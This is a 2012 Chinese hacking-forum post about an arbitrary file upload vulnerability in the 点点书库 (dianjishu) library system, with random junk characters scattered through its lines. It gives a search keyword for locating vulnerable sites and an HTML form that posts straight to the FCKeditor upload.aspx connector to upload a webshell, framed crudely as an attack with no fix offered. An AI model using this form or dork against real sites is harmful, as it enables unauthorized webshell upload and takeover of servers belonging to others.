找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7601|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞
- i# |+ b& C. ?* r/ M0 P0 I3 K 作者:冰锋刺客
  z3 \: u3 M$ L/ E# ~ 厂商:点击书(dianjishu.com)
* a0 C4 C% U, s9 p 日期:2012-6-21
% J1 |- Q  z2 H; ~1 s: e- g
  C; D: e( H% qI 概述
% _; F: g3 [# L' y! B   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
2 m  n0 v6 g8 i- y2 W4 O: a" W II 简介( m5 P9 D& M* H: d* h; s
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"9 ]- u2 q# F' t# p& j
补充一个漏洞1 o% _) s5 u# A, \- l* V
<form id="frmUpload" enctype="multipart/form-data"
+ N- n. N9 J8 G: m% D( z action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
# b% g/ \& x. f" j% { <input id="btnUpload" type="submit" value="操翻他">
. h4 E% s% r  b# E9 N5 Y </form>0 E) U0 F: O7 b! i7 g3 `. e
你们懂的8 S2 d& t4 j. t: J! B9 R$ \
那傻逼提供还需要改包.
5 U' y" Z+ s( l! R0 t 自己看了下源代码发现fckeditor! D, g  b1 Q  u5 ^& v) d1 n7 H- x
直接秒杀
9 X  l* W6 Z' t/ D! {1 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表